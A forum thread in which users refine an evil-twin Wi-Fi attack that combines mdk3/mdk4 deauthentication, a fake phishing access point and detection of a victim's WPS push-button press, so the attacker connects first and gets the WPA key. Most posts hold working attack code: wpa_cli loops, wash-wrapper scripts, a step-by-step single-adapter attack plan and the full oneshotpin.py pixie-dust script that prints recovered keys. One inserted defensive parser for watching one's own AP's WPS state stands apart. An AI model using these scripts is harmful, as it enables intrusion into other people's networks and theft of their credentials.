Free thought for a free internet


#1 22-01-2022 02:31:26

mooooon
User

Registered: 08-02-2019
Posts: 40

A possible improvement to the WPS PBC hack

Instead of

wpacli = Thread.new do
  while true
    system "xterm -e wpa_cli wps_pbc #{$apmac}"   
    sleep(120)
  end
end

We use the wifiphisher method that checks if the PBC button is being pressed or not without trying to connect

        while isinstance(elt_section, dot11.Dot11Elt):
            # check if WPS IE exists
            if elt_section.ID == 221 and\
                    elt_section.info.startswith("\x00P\xf2\x04"):

That way we won't need to stop the AP deauth at all

@Kcdtv  what do you think ?

Also

There is no need for this

Kcdtv wrote:

He gets up to reach the router and activate WPS PBC.
Then he goes back to his chair to press the button on the dongle acting as the victim.
By the time he sits down again it is too late: the "attacker" computer is already connected and pressing the button on the victim does nothing.


and this too

Kcdtv wrote:

What matters is getting there first: if the intruder's connection request is received before the legitimate client's, the intruder connects to our network and obtains the WPA key.
The vulnerability rests on the time a human needs to press a button.
It is both very simple and relentless: a machine sending requests in a loop will always be faster than a human.

As pixiewps supports -7 option

This option requires the attribute encrypted settings found in M7 when the Registrar proved knowledge of the PIN, and the Access Points, the Enrollee, sends its current network configuration.
This feature can be used to crack the WPA-PSK (and WPS PIN) from a passive packet capture (e.g. sniffing a PBC session).

Source :

there's currently no code in wash or similar tools to know whether the button was pushed.
you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d3 … 672e706e67 from wireshark.


which means it can extract the password by just running airodump-ng on a network while someone connects to it using the PBC method

That way, there is no need to be the first or anything

What do you think, is it worth a post update?

Thanks

Last edited by mooooon (22-01-2022 02:32:38)

Offline


#2 22-01-2022 18:06:34

Koala
Very Important User

Registered: 11-09-2016
Posts: 975

Re: A possible improvement to the WPS PBC hack

I saw that the wps_pbc method is becoming a real interest, I enjoy it smile


You take my old code in ruby but you don't specify which code mentioned above is


To avoid any misunderstanding: this code is not Ruby code like the first but Python code from wifiphisher.


That way we won't need to stop the AP deauth at all


You have to take care because sometimes, if the router has been deauthed for a while, the wps_pbc connect will not work. For this reason I stop the deauth only when a client is coming to the fake AP; that way the original router has time to wake up while the victim sees the fake page, and there is more chance to get the wps_pbc connect.

Last edited by Koala (22-01-2022 18:12:53)


Hostbase rogue AP project with Kali-linux xfce.

Debian--Arch--Kali--

Offline

#3 22-01-2022 18:56:11

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

Koala wrote:

I saw that the wps_pbc method is becoming a real interest, I enjoy it smile

Glad that you do wink


You take my old code in ruby but you don't specify which code mentioned above is

The code is from here

https://www.wifi-libre.com/topic-596-vu … html#p9291

To avoid any misunderstanding: this code is not Ruby code like the first but Python code from wifiphisher.

That way we won't need to stop the AP deauth at all

You have to take care because sometimes, if the router has been deauthed for a while, the wps_pbc connect will not work. For this reason I stop the deauth only when a client is coming to the fake AP; that way the original router has time to wake up while the victim sees the fake page, and there is more chance to get the wps_pbc connect.

The problem with this is that not all networks have win10 devices connected to them
which means we have to set the network to open
which means that any device would connect to it
not just the target devices
that way we can't count on the connection of the device to our fake AP to determine if we should stop the deauth or not

Also mdk4 has a client whitelist option if that helps

instead of disconnecting all the clients... we disconnect all the clients except one (ours)
so we no longer need to stop the DoS attacks when the user connects to the fake AP


Check my last reply the one before this about Pixiewps too !

Koala wrote:

I saw that the wps_pbc method is becoming a real interest, I enjoy it smile


You take my old code in ruby but you don't specify which code mentioned above is


To avoid any misunderstanding: this code is not Ruby code like the first but Python code from wifiphisher.


That way we won't need to stop the AP deauth at all


You have to take care because sometimes, if the router has been deauthed for a while, the wps_pbc connect will not work. For this reason I stop the deauth only when a client is coming to the fake AP; that way the original router has time to wake up while the victim sees the fake page, and there is more chance to get the wps_pbc connect.


Hey i tested the tool once again but

the deauth doesn't support channel hopping

which means it doesn't follow channel change

so the deauth is useless !

Thanks

I think maybe it can be done using the waircut method


mooooon wrote:

We use the wifiphisher method that Checks if the pbc button is being pressed or not without trying to connect

Thanks


or using this

wps2key.py

https://github.com/Tourountzis/wifi-pwn … wps2key.py


Last edited by mooooon (22-01-2022 18:59:35)

Offline

#4 24-01-2022 14:54:33

kcdtv
Administrator

Registered: 14-11-2014
Posts: 5,701

Re: A possible improvement to the WPS PBC hack

Hi!

which means it can extract the password by just airodump-ng on a network while someone connect to it using the PBC method
That way , There is no need to be the first or anything

Careful! This pixiewps mode only works with supported Realtek chipsets (mode 3)

   -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)

If that is the case it indeed makes things easier.

Also, there are no "different methods" to detect the state of the WPS registrar. All tools scan and check the PROBE packets. No monitor mode is required for that.

Offline

#5 25-01-2022 18:17:54

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

Hello Kcdtv

Actually there is
by using the loop

wpacli = Thread.new do
  while true
    system "xterm -e wpa_cli wps_pbc #{$apmac}"   
    sleep(120)
  end
end

Also , what method does Hostbase use ?

I tried to use this , but it results in false Positives.

#!/bin/bash
if timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_selected_registrar"; then
   echo Pushed
else 
   echo NotPushed 
fi

Thanks

Offline

#6 26-01-2022 11:12:48

kcdtv
Administrator

Registered: 14-11-2014
Posts: 5,701

Re: A possible improvement to the WPS PBC hack

Two different things here:
  - The while loop (ruby)  is to send (through wpa_cli) a PBC connection request
  - The if condition (bash) is to scan the devices (through wash)
The "method" is to send the PBC request through wpa_cli in both cases.

Offline

#7 26-01-2022 18:18:10

Koala
Very Important User

Registered: 11-09-2016
Posts: 975

Re: A possible improvement to the WPS PBC hack

More details about the ruby code used in hostbase, I commented it for you:


wpacli = Thread.new do # create a new thread called "wpacli"; it runs in the background, which is more efficient than having a lot of windows on the same screen
  while true  # the beginning of the loop
    system "xterm -e wpa_cli wps_pbc #{$apmac}"  # the command executed by the thread: the wpa_cli command launched every 120 seconds
    sleep(120)  # the time before the loop repeats
  end  # the end of the loop
end

In my oldest version of hostbase the bash code is the following:


while : ; do
    xterm -e wpa_cli wps_pbc "${BSSID}"
    sleep 120
done &
echo $! >/tmp/wpacliactu.pid

The bash code above does exactly the same thing as the ruby code I explained. Don't forget to kill the pid generated by wpa_cli


Before you go testing tools, I strongly recommend that you understand how wpa_cli works.


Also wpa_cli has an interactive command line to do everything you want to do cool

Last edited by Koala (26-01-2022 18:23:40)


Hostbase rogue AP project with Kali-linux xfce.

Debian--Arch--Kali--

Offline

#8 26-01-2022 19:31:38

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

kcdtv wrote:

Two different things here:
  - The while loop (python)  is to send (through wpa_cli) a PBC connection request

But that isn't a good idea when mdk3 is deauthing the target network!

- The if condition (bash) is to scan the devices (through wash)

This option is better. That way we can send a connection request only if the PBC is activated! So mdk3 won't be an issue when checking; we kill it after we detect the button pushed in probe requests

The "method" is to send the PBC request through wpa_cli in both cases.


Nah the Wpa_cli is troublesome, I recommend using the OneShot Python script. It's easier to use and prints the password automatically

Start WPS push button connection:

sudo python3 oneshot.py -i wlan0mon --pbc

so we use it like this

import subprocess, sys
import os
argv = list(sys.argv)
argv[0] = 'wash'
proc = subprocess.Popen(argv, executable=argv[0], stdout=subprocess.PIPE)
while 1:
    line = proc.stdout.readline()
    if line == '': break
    print line
    if '"wps_device_password_id" : "0004"' in line:
        proc.terminate()
        os.system("sudo python3 /root/OneShot-master/oneshot.py -i wlan0mon --pbc")
        break
#Usage : washwrapper.py -j -i wlan0mon -c 6 -b XX:XX:XX:XX:XX:XX

Koala wrote:

More details about the ruby code used in hostbase, i commented it for you:


wpacli = Thread.new do # create a new thread called "wpacli"; it runs in the background, which is more efficient than having a lot of windows on the same screen
  while true  # the beginning of the loop
    system "xterm -e wpa_cli wps_pbc #{$apmac}"  # the command executed by the thread: the wpa_cli command launched every 120 seconds
    sleep(120)  # the time before the loop repeats
  end  # the end of the loop
end

Oh thanks a lot for commenting it for me. But again, the same as I replied to kcdtv: it's not efficient to use wpa_cli wps_pbc with mdk3, as we would have to use only one of them at a time but not both! And the fact is that wpa_cli wps_pbc would result in a fixed channel error, while we can easily use mdk3 + wash, because wash wouldn't have to try to connect to check if the button was pushed or not but monitors the traffic passively, and we can specify the channel in wash; that way we won't get the fixed channel error


In my oldest version of hostbase the bash code is the following:


while : ; do
    xterm -e wpa_cli wps_pbc "${BSSID}"
    sleep 120
done &
echo $! >/tmp/wpacliactu.pid

The bash code above does exactly the same thing as the ruby code I explained. Don't forget to kill the pid generated by wpa_cli


Before you go testing tools, I strongly recommend that you understand how wpa_cli works.


Also wpa_cli has an interactive command line to do everything you want to do cool

I still don't understand why you would use wpa_cli to check if the button was pushed or not when it's stated in the Wi-Fi Protected Setup Specification. @Patcher linked me to it, and told me that he uses that method with the waircut PBC option

The AP informs Enrollees that the Selected Registrar is in PBC mode using Probe Response messages

The Enrollee performs this scan by sending out probe requests with a Device Password ID indicating that the Enrollee is in PBC mode and receiving probe responses indicating a Selected Registrar with a PBC Device Password ID.

When an AP receives a Selected Registrar and Device Password ID indicating PBC mode from a Registrar, it MUST automatically remove this information and no longer include it in probe responses after an interval of Walk Time has elapsed. Before the Registrar’s button is pushed, the AP shall not advertise any active PBC state.

And from another WPS documentation titled : Wireless LAN PCI Card User Manual V1.1

Device Password ID : Indicate the method or identifies the specific password that the selected Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.

That way using

timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed 

is more than enough to check if the button was pushed or not



I also tested the latest hostbase wifislax version

And the channel hopping wasn't working at all !

How it's supposed to be able to check the channel change while it's running wpa_cli wps_pbc whenever it's not deauthing using mdk3 !

Also the thing that the latest version would only work if the target network Has A laptop connected to it .. IS so annoying .... Like the most of the networks has mobile phones only connected to them and rarely there is any laptop !


Also if the target network had A laptop on it  it would be super EASY to hack the network with No Phishing at all !
Using this method

Hacking Wi-Fi with cached JavaScript Via Browsers Cache Poisoning

I also like to add that the whole hostbase wps Phishing attack can be  done using only a single adapter !

  • We launch the Fake AP on the same channel as the original network

  • We run MDK4 -b target mac -c channel

  • We run the wash | grep -q "wps_device_password_id" , if the button was pushed then we kill everything and use oneshot to connect

  • Run something like airodump-ng on target AP with the channel it already found , to monitor for channel change

  • Then if airodump-ng can no longer detect/find the AP on that channel then it kills mdk4 and the fake AP & wash and then  starts looking for the AP on other channels

  • And after finding the new channel , It restarts mdk4 & Fake AP & wash with the new channel provided to it as an argument

  • then airodump-ng starts monitoring the target on that channel again , to look for possible channel change

As a bonus now the Fake AP is stealthy and won't get the user suspicious  when He shutdowns the Routers and still see the Fake AP network not disappearing

What do you think ?

Offline
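
Added example (not part of any post above, and not code from wash, wifiphisher or waircut): a parser for the WPS information element that the specification excerpts in post #8 describe, written for watching the beacons or probe responses of your own AP. It separates an idle AP, a selected registrar that is not in PBC mode, and an active PBC window (Device Password ID 0x0004), and reports windows that outlast the two-minute Walk Time. The attribute numbers 0x1041 and 0x1012 are taken from the WSC specification; the function names, state names and sample frames are constructed for this example.

```python
import struct

# Vendor-specific IE (ID 221) whose body starts with OUI 00:50:F2 and type 4
# is the WPS IE; this is the "\x00P\xf2\x04" prefix quoted in post #1.
VENDOR_IE = 221
WPS_PREFIX = b"\x00\x50\xf2\x04"

# WSC attribute types (from the WSC specification, not from this thread).
ATTR_DEVICE_PASSWORD_ID = 0x1012
ATTR_SELECTED_REGISTRAR = 0x1041
DEV_PW_PUSHBUTTON = 0x0004
WALK_TIME = 120  # seconds; the two-minute Walk Time quoted in post #8


def iter_elements(ies):
    """Yield (element_id, body) pairs; stop quietly on a truncated element."""
    pos = 0
    while pos + 2 <= len(ies):
        eid, length = ies[pos], ies[pos + 1]
        body = ies[pos + 2:pos + 2 + length]
        if len(body) < length:
            return
        yield eid, body
        pos += 2 + length


def parse_wps_attrs(body):
    """Parse the TLVs after the 4-byte prefix: 2-byte type, 2-byte length, big endian."""
    attrs, pos = {}, len(WPS_PREFIX)
    while pos + 4 <= len(body):
        atype, alen = struct.unpack_from(">HH", body, pos)
        value = body[pos + 4:pos + 4 + alen]
        if len(value) < alen:
            break
        attrs[atype] = value
        pos += 4 + alen
    return attrs


def pbc_state(ies):
    """Classify the tagged parameters of one beacon or probe response."""
    for eid, body in iter_elements(ies):
        if eid != VENDOR_IE or not body.startswith(WPS_PREFIX):
            continue
        attrs = parse_wps_attrs(body)
        if not any(attrs.get(ATTR_SELECTED_REGISTRAR, b"")):
            return "idle"
        dev_pw = attrs.get(ATTR_DEVICE_PASSWORD_ID, b"")
        if len(dev_pw) == 2 and struct.unpack(">H", dev_pw)[0] == DEV_PW_PUSHBUTTON:
            return "pbc-active"
        return "registrar-not-pbc"
    return "no-wps"


def pbc_windows(observations):
    """Turn (timestamp, ies) samples into (start, end) intervals with PBC active."""
    windows, start, last = [], None, None
    for ts, ies in sorted(observations, key=lambda o: o[0]):
        active = pbc_state(ies) == "pbc-active"
        if active and start is None:
            start = ts
        elif not active and start is not None:
            windows.append((start, ts))
            start = None
        last = ts
    if start is not None:
        windows.append((start, last))
    return windows


def overlong(windows, limit=WALK_TIME):
    """Windows still advertised after the Walk Time; worth an alert on your own AP."""
    return [w for w in windows if w[1] - w[0] > limit]


# --- constructed sample data (not captured traffic) ---
def build_ie(eid, body):
    return bytes([eid, len(body)]) + body


def build_tlv(atype, value):
    return struct.pack(">HH", atype, len(value)) + value


SSID_ONLY = build_ie(0, b"lab-ap")
BASE = build_tlv(0x104A, b"\x10") + build_tlv(0x1044, b"\x02")  # Version, WPS State
IDLE = SSID_ONLY + build_ie(VENDOR_IE, WPS_PREFIX + BASE)
PIN = SSID_ONLY + build_ie(VENDOR_IE, WPS_PREFIX + BASE
                           + build_tlv(ATTR_SELECTED_REGISTRAR, b"\x01")
                           + build_tlv(ATTR_DEVICE_PASSWORD_ID, b"\x00\x00"))
PBC = SSID_ONLY + build_ie(VENDOR_IE, WPS_PREFIX + BASE
                           + build_tlv(ATTR_SELECTED_REGISTRAR, b"\x01")
                           + build_tlv(ATTR_DEVICE_PASSWORD_ID, b"\x00\x04"))

if __name__ == "__main__":
    samples = [(0, IDLE), (10, PBC), (70, PBC), (130, IDLE), (200, PIN)]
    for ts, ies in samples:
        print(ts, pbc_state(ies))
    print("windows:", pbc_windows(samples))
```

A test that only looks for the presence of the Selected Registrar or Device Password ID attribute cannot tell the `registrar-not-pbc` case from `pbc-active`; the value has to be compared with 0x0004.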

#9 27-01-2022 16:38:37

kcdtv
Administrator

Registered: 14-11-2014
Posts: 5,701

Re: A possible improvement to the WPS PBC hack

Nah the Wpa_cli is troublesome, I recommend using the OneShot Python script. It's easier to use and prints the password automatically

Nah yourself big_smile
oneshot.py (originally created by our colleague and forum member rofl0r) is a "wrapper" for wpa_supplicant and its interactive command line (CLI), wpa_cli.

It is based entirely on wpa_supplicant/wpa_cli:
- creating the configuration file for wpa_supplicant:

        self.tempdir = tempfile.mkdtemp()
        with tempfile.NamedTemporaryFile(mode='w', suffix='.conf', delete=False) as temp:
            temp.write('ctrl_interface={}\nctrl_interface_group=root\nupdate_config=1\n'.format(self.tempdir))
            self.tempconf = temp.name
        self.wpas_ctrl_path = f"{self.tempdir}/{interface}"
        self.__init_wpa_supplicant()

- launching wpa_supplicant

    def __init_wpa_supplicant(self):
        print('[*] Running wpa_supplicant…')
        cmd = 'wpa_supplicant -K -d -Dnl80211,wext,hostapd,wired -i{} -c{}'.format(self.interface, self.tempconf)
        self.wpas = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT, encoding='utf-8', errors='replace')
        # Waiting for wpa_supplicant control interface initialization

And all the output messages talk about wpa_supplicant...

    def _explain_wpas_not_ok_status(command: str, respond: str):
        if command.startswith(('WPS_REG', 'WPS_PBC')):
            if respond == 'UNKNOWN COMMAND':
                return ('[!] It looks like your wpa_supplicant is compiled without WPS protocol support. '
                        'Please build wpa_supplicant with WPS support ("CONFIG_WPS=y")')
        return '[!] Something went wrong — check out debug log'

Wpa_cli is no trouble, wpa_cli is the way. big_smile
You want to go faster than the music... If what you intend is to research and refine something, you first have to understand one hundred percent what you are doing,
and you won't achieve that by using third-party scripts; you'll achieve it by doing things by hand...
For example, the pixiedust attack that oneshot.py performs is nothing more than automating a couple of commands and cleaning up the output with regular expressions: Universal method for carrying out a pixie dust attack (without monitor mode)
And you'll see that in that thread we talk precisely about oneshotpin...

kcdtv wrote:

rofl0r has left a Python script (oneshotpin.py) in the reaver repository:

#!/usr/bin/env python2

import sys, subprocess, os, tempfile, shutil

class Data():
	def __init__(self):
		self.pke = ''
		self.pkr = ''
		self.e_hash1 = ''
		self.e_hash2 = ''
		self.authkey = ''
		self.e_nonce = ''
		self.wpa_psk = ''
		self.state = ''

class Options():
	def __init__(self):
		self.interface = None
		self.bssid = None
		self.pin = None
		self.pixiemode = False
		self.verbose = False
		self.showpixiecmd = False

def shellcmd(cmd):
	proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
	# Popen has no read(); read the captured output from its stdout pipe
	result = proc.stdout.read()
	proc.wait()
	return result

def run_wpa_supplicant(options):
	options.tempdir = tempfile.mkdtemp()
	with tempfile.NamedTemporaryFile(suffix='.conf', delete=False) as temp:
		temp.write("ctrl_interface=%s\nctrl_interface_group=root\nupdate_config=1\n"%(options.tempdir))
		options.tempconf=temp.name
	cmd = 'wpa_supplicant -K -d -Dnl80211,wext,hostapd,wired -i%s -c%s'%(options.interface, options.tempconf)
	proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
	return proc

def run_wpa_cli(options):
	cmd = 'wpa_cli -i%s -p%s'%(options.interface, options.tempdir)
	proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
	return proc

def recvuntil(pipe, what):
	s = ''
	while True:
		inp = pipe.stdout.read(1)
		if inp == '': return s
		s += inp
		if what in s: return s

def got_all_pixie_data(data):
	return data.pke and data.pkr and data.e_nonce and data.authkey and data.e_hash1 and data.e_hash2

def statechange(data, old, new):
	print '%s -> %s'%(old, new)
	data.state = new
	return True

def process_wpa_supplicant(pipe, options, data):
	def get_hex(line):
		a = line.split(':', 3)
		return a[2].replace(' ', '')

	line = pipe.stdout.readline()
	if line == '':
		pipe.wait()
		return False
	line = line.rstrip('\n')

	if options.verbose: sys.stderr.write(line + '\n')

	if line.startswith('WPS: '):
		if 'Enrollee Nonce' in line and 'hexdump' in line:
			data.e_nonce = get_hex(line)
			assert(len(data.e_nonce) == 16*2)
		elif 'DH own Public Key' in line and 'hexdump' in line:
			data.pkr = get_hex(line)
			assert(len(data.pkr) == 192*2)
		elif 'DH peer Public Key' in line and 'hexdump' in line:
			data.pke = get_hex(line)
			assert(len(data.pke) == 192*2)
		elif 'AuthKey' in line and 'hexdump' in line:
			data.authkey = get_hex(line)
			assert(len(data.authkey) == 32*2)
		elif 'E-Hash1' in line and 'hexdump' in line:
			data.e_hash1 = get_hex(line)
			assert(len(data.e_hash1) == 32*2)
		elif 'E-Hash2' in line and 'hexdump' in line:
			data.e_hash2 = get_hex(line)
			assert(len(data.e_hash2) == 32*2)
		elif 'Network Key' in line and 'hexdump' in line:
			data.wpa_psk = get_hex(line).decode('hex')
		elif 'Building Message M' in line:
			statechange(data, data.state, 'M' + line.split('Building Message M')[1])
		elif 'Received M' in line:
			statechange(data, data.state, 'M' + line.split('Received M')[1])

	elif ': State: ' in line:
		statechange(data, *line.split(': State: ')[1].split(' -> '))
	elif 'WPS-FAIL' in line:
		print "WPS-FAIL :("
		return False

	elif 'NL80211_CMD_DEL_STATION' in line:
		#if data.state == 'ASSOCIATED':
		#	print "URGH"
		print "[ERROR]: unexpected interference - kill NetworkManager/wpa_supplicant!"
		#return False
	elif 'Trying to authenticate with' in line:
		print line
	elif 'Authentication response' in line:
		print line
	elif 'Trying to associate with' in line:
		print line
	elif 'Associated with' in line:
		print line
	elif 'EAPOL: txStart' in line:
		print line

	return True

def die(msg):
	sys.stderr.write(msg + '\n')
	sys.exit(1)

def usage():
	die( \
"""
oneshotpin 0.0.2 (c) 2017 rofl0r

Required Arguments:
	-i, --interface=<wlan0>  Name of the interface to use
	-b, --bssid=<mac>        BSSID of the target AP

Optional Arguments:
	-p, --pin=<wps pin>      Use the specified pin (arbitrary string or 4/8 digit pin)
	-K, --pixie-dust         Run pixiedust attack
	-X                       Alway print pixiewps command
	-v                       Verbose output

Example:
	%s -i wlan0 -b 00:90:4C:C1:AC:21 -p 12345670 -K
""" % sys.argv[0])

def get_pixie_cmd(data):
	return "pixiewps --pke %s --pkr %s --e-hash1 %s --e-hash2 %s --authkey %s --e-nonce %s" % \
		(data.pke, data.pkr, data.e_hash1, data.e_hash2, data.authkey, data.e_nonce)

def cleanup(wpas, wpac, options):
	wpac.stdin.write('terminate\nquit\n')
	wpas.terminate()
	wpac.terminate()
	shutil.rmtree(options.tempdir, ignore_errors=True)
	os.remove(options.tempconf)

if __name__ == '__main__':
	options = Options()

	import getopt
	optlist, args = getopt.getopt(sys.argv[1:], ":e:i:b:p:XKv", ["help", "interface", "bssid", "pin", "pixie-dust"])
	for a,b in optlist:
		if   a in ('-i', "--interface"): options.interface = b
		elif a in ('-b', "--bssid"): options.bssid = b
		elif a in ('-p', "--pin"): options.pin = b
		elif a in ('-K', "--pixie-dust"): options.pixiemode = True
		elif a in ('-X'): options.showpixiecmd = True
		elif a in ('-v'): options.verbose = True
		elif a == '--help': usage()
	if not options.interface or not options.bssid:
		die("missing required argument! (use --help for usage)")
	if options.pin == None and not options.pixiemode:
		die("you need to supply a pin or enable pixiemode! (use --help for usage)")
	if options.pin == None and options.pixiemode:
		options.pin = '12345670'

	if os.getuid() != 0:
		die("oops, try as root")

	data = Data()
	wpas = run_wpa_supplicant(options)
	while True:
		s = recvuntil(wpas, '\n')
		if options.verbose: sys.stderr.write(s)
		if 'update_config=1' in s: break

	wpac = run_wpa_cli(options)
	recvuntil(wpac, '\n> ')
	wpac.stdin.write('wps_reg %s %s\n' % (options.bssid, options.pin))
#	while True:
#		sys.stderr.write( wpac.stdout.read(1) )
	recvuntil(wpac, 'OK')

	pixiecmd = None

	while True:
		try:
			res = process_wpa_supplicant(wpas, options, data)
		except KeyboardInterrupt:
			print "aborting..."
			res = False

		if not res: break

		if got_all_pixie_data(data):
			pixiecmd = get_pixie_cmd(data)

		if options.pixiemode and pixiecmd:
			cleanup(wpas, wpac, options)
			print "running %s" % pixiecmd
			os.execlp('/bin/sh', '/bin/sh', '-c', pixiecmd)
			# shouldnt get here
			sys.exit(1)

		if data.wpa_psk:
			if options.showpixiecmd and pixiecmd: print pixiecmd
			cleanup(wpas, wpac, options)
			print "!!! GOT WPA KEY !!!: %s" % data.wpa_psk
			sys.exit(0)

	print "hmm, seems something went wrong..."
	if options.showpixiecmd and pixiecmd: print pixiecmd
	cleanup(wpas, wpac, options)
	sys.exit(1)

see: timout errors #175
There are two "commands" to run.
Once the interface has been selected with your menu system and the *.conf "file" (three lines, even one) has been put somewhere, you must:
1. Start wpa_supplicant in debug mode, pointing it to the configuration file. You must send the process to the background and "watch" the output (which you duplicate). Bash has no "multi-threading" (Python is better for this), so you have to manage with whatever trick suits you.

wpa_supplicant -i <interfaz> -c /ruta/fichero/*conf -K -B

-K for debug and -B to send the process to the background
2. Send a PIN

wpa_cli -i <Interfaz> wps_reg <Bssid> <PIN> 

Then collect the strings and build the pixiedust line.
I made a script to do a PBC connection with wpa_cli and it is almost the same process (there is no collecting of strings, but that is the least of it) except that I send a PBC request instead of sending a PIN.
Each step is described in the console, so you have a description of each operation:

echo -e "$white▐█$purpple   Shutting down network manager$nocolour (wifi connexion will be lost)"
systemctl stop network-manager
echo -e "$white▐█$purpple   Killing conflictual process$nocolour"
killall wpa_supplicant dhclient 2>/dev/null
echo -e "$white▐█$purpple   Soft block control$nocolour"
rfkill unblock wifi
echo -e "$white▐█$purpple   Managed mode control$nocolour"
ip link set "$interface" down
iwconfig "$interface" mode managed
ip link set "$interface" up
echo -e "$white▐█$purpple   Creation of wpa_supplicant configuration file$nocolour" 
echo "ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1" >> /tmp/PBC.conf
echo -e "$white▐█$purpple   Launching wpa-supplicant$nocolour"
wpa_supplicant -c /tmp/PBC.conf -i "$interface" -B 

Here it is: PBC.sh
I use iwconfig to select the interface and it would have been better to do it with iw (iwconfig is "abandoned", iw is not)
One way of doing it... It all comes down to managing the processes you send to the background.

Offline

#10 27-01-2022 19:38:58

mooooon
User

Registered: 08-02-2019
Posts: 40

Re: A possible improvement to the WPS PBC hack

kcdtv wrote:

Nah the Wpa_cli is troublesome, I recommend using the OneShot Python script. It's easier to use and prints the password automatically

Nah yourself big_smile
oneshot.py (originally created by our colleague and forum member rofl0r) is a "wrapper" for wpa_supplicant and its interactive command line (CLI), wpa_cli.

https://www.wifi-libre.com/img/members/3/oneshot_1.jpg

Oh boy ! looks like i missed a lot haha

but to be honest the original from rofl0r doesn't have nor support PBC

only the one from drygdryg does.

And still oneshot is quicker than doing it the manual way

I would have used kcdtv/PBC, but the problem is that... it does it on all channels

While I want it to only scan on a single channel and proceed to try to connect only if the PBC press has been detected in monitor mode without network manager. This way it can be used beside other attacks like the hostbase

so this would be a better method. It's better than the method hostbase uses! That's why I came here and made this post
the hostbase method would make it troublesome to have mdk3 and Rogue AP using only two adapters
while supporting channel hopping for mdk3
as how will wpa_cli wps_pbc detect if the button was pushed or not without stopping mdk3?
we have to be able to have an indicator that tells if the button was pushed or not by just monitoring passively. This way we can do the whole attack
with only two or one adapters without needing to stop mdk3 for more than 5 seconds
And this is the exact opposite of what hostbase does

#!/bin/bash
wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8   > file.txt &
PIDOFWASH=$!
until grep -q '"wps_device_password_id" : "0004"' file.txt;
do
sleep 1;
done;
echo found
kill ${PIDOFWASH}
sleep 2
sudo python3 /root/OneShot-master/oneshot.py -i wlan0mon --pbc

I am looking for way to join the script above
with mdk3 with channel hopping + Fake AP
only using two adapters

do you know how ?


looks like i came late into the scene

also is there way to do  wpa_cli wps_pbc in monitor mode ?

I suggested to rofl0r to add it to Reaver  issue num 107 before I opened that issue Wash wasn't able to detect if the button has been pushed or not. They just added showing wps_device_password_id in the JSON mode of wash


I am the one who suggested PBC phishing to wifiphisher years ago but it doesn't actually work haha

I am currently looking for a way to pull Evil twin with channel hopping + PBC Using only a Single adapter

Also how does wpa_cli wps_pbc work ? does it work the same way as

timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -q "wps_device_password_id" && echo Pushed || echo NotPushed

or ... ?

Offline

#11 27-01-2022 19:56:47

Koala
Very Important User

Registered: 11-09-2016
Posts: 975

Re: A possible improvement to the WPS PBC hack

Two different things here:
  - The while loop (python)  is to send (through wpa_cli) a PBC connection request

But that isn't a good idea when mdk3 is deauthing the target network!


For this reason we have to stop mdk3/4 before making a PBC request on the AP when a client connects to the fake AP. Like I said before, if you stop mdk3/4 just when the PBC is alive on the AP, you will have some trouble getting the WPS access, because not all APs act the same way and the deauth with mdk3/4 is very powerful and can crash an AP for a while.



I still don't understand why would you use wpa cli to check if the button was pushed or not while it's stated in the Wi-Fi Protected Setup Specification @Patcher linked me to it , and told me that he uses that method with waircut PBC option



Anyway, if you don't go with wpa_cli I think it is a big mistake, and like Kcdtv said, "wpa_cli is the way" wink



also tested the latest hostbase wifislax version

And the channel hopping wasn't working at all !

How it's supposed to be able to check the channel change while it's running wpa_cli wps_pbc whenever it's not deauthing using mdk3 !

Also the thing that the latest version would only work if the target network Has A laptop connected to it .. IS so annoying .... Like the most of the networks has mobile phones only connected to them and rarely there is any laptop !




-1 The version of hostbase for wifislax is completely outdated. Since that time I made a lot of changes to improve channel hopping and it works fine now.
-2 You are confused here. Wps_pbc works only when the fake AP with WPA encryption is launched to let the victim connect to us; then, when a client connects to the fake AP, the deauth stops and wps_pbc against the target AP begins


I'd also like to add that the whole hostbase WPS phishing attack can be done using only a single adapter!

We launch the fake AP on the same channel as the original network

We run MDK4 -b target mac -c channel

We run wash | grep -q "wps_device_password_id"; if the button was pushed, then we kill everything and use oneshot to connect

Run something like airodump-ng on the target AP with the channel it already found, to monitor for a channel change

Then, if airodump-ng can no longer detect/find the AP on that channel, it kills mdk4, the fake AP and wash, and then starts looking for the AP on other channels

And after finding the new channel, it restarts mdk4, the fake AP and wash with the new channel provided to it as an argument

Then airodump-ng starts monitoring the target on that channel again, to look for a possible channel change

As a bonus, the fake AP is now stealthy and won't make the user suspicious when he shuts down the router and still sees the fake AP network not disappearing

What do you think?



-1 The hostbase WPS phishing attack can be done with one adapter only if the target AP is on the 2.4GHz frequency. Now in 2022 a lot of APs have two frequencies, one in 2.4GHz and one in 5GHz. We can't do a good deauth on both frequencies with the same adapter, so we need at least 2 adapters. In my personal experience I use 3 adapters: one for the fake AP, the second for the deauth on the 2.4GHz frequency and the third for the deauth on the 5GHz frequency.


-2 In my own experience (I like to spend my time testing things big_smile) you can't launch the fake AP on the same channel as the real AP, because if you want to do an efficient deauth, the channel of the fake AP, which is the same channel as the real AP, will be saturated at the same time and the victim can't join the fake AP.


-3 The best way to test channel hopping is wash; I was using airodump-ng before but finally I use wash. Also, we don't need to restart the fake AP at all; trust me, users in the majority of cases don't shut down their APs.


In your previous post you mentioned that:


The problem with this is that not all networks have Win10 devices connected to them,
which means we have to set the network to open,
which means that any device would connect to it,
not just the target devices.
